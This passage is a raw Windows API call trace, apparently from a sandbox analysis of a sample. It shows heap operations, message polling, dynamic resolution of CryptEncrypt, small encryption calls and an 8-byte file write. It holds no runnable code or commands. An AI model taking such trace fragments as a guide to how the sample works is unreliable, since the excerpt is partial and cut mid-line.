0x2a5e640 [0138.540] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0138.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d38 [0138.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d58 [0138.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71a0 [0138.541] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71a0 | out: hHeap=0x2af0000) returned 1 [0138.541] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0138.541] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0138.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0138.541] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0138.541] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e880 | out: hHeap=0x2af0000) returned 1 [0138.541] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0138.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ce8 [0138.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fa0 [0138.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0c0 [0138.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ca8 [0138.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0138.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c48 [0138.541] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0138.541] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78278 | out: hHeap=0x2af0000) returned 1 [0138.541] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0138.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa108 [0138.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0138.541] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0138.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cb8 [0138.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d58 [0138.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa480 [0138.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa4e0 [0138.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bd8 [0138.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa498 [0138.542] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0138.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d98 [0138.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0138.542] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0138.542] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782f0 | out: hHeap=0x2af0000) returned 1 [0138.542] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0138.542] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa498 | out: hHeap=0x2af0000) returned 1 [0138.542] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4e0 | out: hHeap=0x2af0000) returned 1 [0138.542] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa480 | out: hHeap=0x2af0000) returned 1 [0138.542] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0138.542] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0138.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed40 [0138.542] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0138.542] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed40 | out: hHeap=0x2af0000) returned 1 [0138.542] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0138.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c08 [0138.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cb8 [0138.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa360 [0138.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa300 [0138.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cf8 [0138.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa3d8 [0138.542] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0138.542] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3d8 | out: hHeap=0x2af0000) returned 1 [0138.542] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa300 | out: hHeap=0x2af0000) returned 1 [0138.542] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa360 | out: hHeap=0x2af0000) returned 1 [0138.542] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0138.543] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c08 | out: hHeap=0x2af0000) returned 1 [0138.543] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0138.543] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa108 | out: hHeap=0x2af0000) returned 1 [0138.543] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0138.543] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa108 [0138.543] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c48 [0138.543] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0138.543] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0138.543] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0138.543] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fa0 | out: hHeap=0x2af0000) returned 1 [0138.543] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0138.543] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0138.543] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0138.543] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa390 | out: hHeap=0x2af0000) returned 1 [0138.543] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa348 | out: hHeap=0x2af0000) returned 1 [0138.543] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa300 | out: hHeap=0x2af0000) returned 1 [0138.543] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0138.543] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0138.543] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fd0 | out: hHeap=0x2af0000) returned 1 [0138.543] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0138.543] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0138.544] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0138.544] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa300 | out: hHeap=0x2af0000) returned 1 [0138.544] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2a0 | out: hHeap=0x2af0000) returned 1 [0138.544] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa288 | out: hHeap=0x2af0000) returned 1 [0138.544] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0138.544] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0138.544] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0138.544] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa528 | out: hHeap=0x2af0000) returned 1 [0138.544] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa408 | out: hHeap=0x2af0000) returned 1 [0138.544] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4e0 | out: hHeap=0x2af0000) returned 1 [0138.544] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0138.544] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0138.544] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0138.544] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa288 | out: hHeap=0x2af0000) returned 1 [0138.544] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0138.544] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0138.544] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3c0 | out: hHeap=0x2af0000) returned 1 [0138.544] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa258 | out: hHeap=0x2af0000) returned 1 [0138.544] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0138.544] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0138.544] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0138.544] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0138.544] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3c0 | out: hHeap=0x2af0000) returned 1 [0138.544] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2d0 | out: hHeap=0x2af0000) returned 1 [0138.544] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa288 | out: hHeap=0x2af0000) returned 1 [0138.544] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0138.544] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0138.544] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2d0 | out: hHeap=0x2af0000) returned 1 [0138.545] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0138.545] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa300 | out: hHeap=0x2af0000) returned 1 [0138.545] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0138.545] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa330 | out: hHeap=0x2af0000) returned 1 [0138.545] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0138.545] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa300 | out: hHeap=0x2af0000) returned 1 [0138.545] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0138.545] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa300 | out: hHeap=0x2af0000) returned 1 [0138.545] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0138.545] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa318 | out: hHeap=0x2af0000) returned 1 [0138.545] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0138.545] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa300 | out: hHeap=0x2af0000) returned 1 [0138.545] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0138.545] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa318 | out: hHeap=0x2af0000) returned 1 [0138.545] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0138.545] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3a8 | out: hHeap=0x2af0000) returned 1 [0138.545] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0138.545] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3c0 | out: hHeap=0x2af0000) returned 1 [0138.545] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0138.545] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2d0 | out: hHeap=0x2af0000) returned 1 [0138.545] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2d0 | out: hHeap=0x2af0000) returned 1 [0138.545] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0138.545] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3c0 | out: hHeap=0x2af0000) returned 1 [0138.545] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0138.545] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3a8 | out: hHeap=0x2af0000) returned 1 [0138.545] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0138.545] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2d0 | out: hHeap=0x2af0000) returned 1 [0138.545] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0138.545] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa348 | out: hHeap=0x2af0000) returned 1 [0138.545] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0138.545] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2d0 | out: hHeap=0x2af0000) returned 1 [0138.546] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0138.546] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0138.546] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaa300, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0138.546] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa300 | out: hHeap=0x2af0000) returned 1 [0138.546] GetProcAddress (hModule=0x76390000, lpProcName="CryptEncrypt") returned 0x763c2cf0 [0138.546] CryptEncrypt (in: hKey=0x9a43c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x8) returned 1 [0138.546] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0138.546] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0138.546] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0138.546] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0138.546] CharLowerBuffW (in: lpsz="byte[8]", cchLength=0x7 | out: lpsz="byte[8]") returned 0x7 [0138.546] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0138.546] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0138.546] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0138.546] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0138.546] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0138.547] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0138.547] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0138.547] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0138.547] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0138.547] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaa240, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0138.547] CryptEncrypt (in: hKey=0x9a43c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2a71bd8*, pdwDataLen=0x8cef60*=0x0, dwBufLen=0x8 | out: pbData=0x2a71bd8*, pdwDataLen=0x8cef60*=0x8) returned 1 [0138.547] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0138.547] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0138.547] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0138.547] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0138.547] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0138.547] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0138.547] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0138.547] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0138.547] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0138.547] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0138.548] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0138.548] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0138.548] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0138.548] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0138.548] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0138.548] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0138.548] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0138.548] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0138.548] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0138.548] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0138.548] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0138.548] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0138.548] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0138.548] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0138.548] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0138.548] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0138.548] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0138.548] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0138.548] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0138.548] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0138.548] WriteFile (in: hFile=0x4b0, lpBuffer=0x2a71c48*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2a71c48*, lpNumberOfBytesWritten=0x8cf5e4*=0x8, lpOverlapped=0x0) returned 1 [0138.549] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0138.549] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0138.550] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0138.550] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0138.550] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0138.550] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0138.550] PeekMessageW (in: 